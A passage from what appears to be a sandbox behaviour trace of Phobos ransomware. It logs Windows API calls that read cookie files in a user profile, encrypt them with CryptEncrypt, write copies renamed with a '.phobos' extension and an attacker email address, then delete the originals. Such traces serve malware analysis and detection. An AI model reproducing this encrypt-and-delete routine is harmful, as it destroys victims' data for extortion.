HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt")) returned 0x2020 [0194.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.267] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.267] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.268] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.268] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc4, lpOverlapped=0x0) returned 1 [0194.269] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0194.269] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0194.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.270] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.270] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.270] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.270] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0194.271] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.271] CloseHandle (hObject=0x180) returned 1 [0194.271] CloseHandle (hObject=0x14c) returned 1 [0194.271] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt")) returned 1 [0194.272] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.273] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=543) returned 1 [0194.273] CloseHandle (hObject=0x14c) returned 1 [0194.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt")) returned 0x2020 [0194.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.273] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.273] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.276] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.276] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x21f, lpOverlapped=0x0) returned 1 [0194.277] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x220, dwBufLen=0x220 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x220) returned 1 [0194.277] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x220, lpOverlapped=0x0) returned 1 [0194.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.278] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.278] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.278] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.278] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0194.278] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.279] CloseHandle (hObject=0x14c) returned 1 [0194.279] CloseHandle (hObject=0x180) returned 1 [0194.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt")) returned 1 [0194.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.281] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=272) returned 1 [0194.281] CloseHandle (hObject=0x180) returned 1 [0194.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt")) returned 0x2020 [0194.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.281] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.281] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.282] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.282] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.282] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x110, lpOverlapped=0x0) returned 1 [0194.283] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0194.283] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0194.284] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.284] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.284] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.284] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.284] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0194.284] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.284] CloseHandle (hObject=0x180) returned 1 [0194.284] CloseHandle (hObject=0x14c) returned 1 [0194.284] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt")) returned 1 [0194.285] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.286] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=118) returned 1 [0194.286] CloseHandle (hObject=0x14c) returned 1 [0194.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt")) returned 0x2020 [0194.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.286] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.286] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.287] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.287] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.287] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x76, lpOverlapped=0x0) returned 1 [0194.288] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80, dwBufLen=0x80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80) returned 1 [0194.288] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x80, lpOverlapped=0x0) returned 1 [0194.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.289] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.289] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.289] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.289] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0194.289] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.290] CloseHandle (hObject=0x14c) returned 1 [0194.290] CloseHandle (hObject=0x180) returned 1 [0194.290] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt")) returned 1 [0194.291] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.292] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=823) returned 1 [0194.292] CloseHandle (hObject=0x180) returned 1 [0194.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt")) returned 0x2020 [0194.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.292] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.292] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0194.293] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.293] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x337, lpOverlapped=0x0) returned 1 [0194.299] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x340, dwBufLen=0x340 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x340) returned 1 [0194.299] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x340, lpOverlapped=0x0) returned 1 [0194.300] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.300] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.300] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0194.300] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.300] 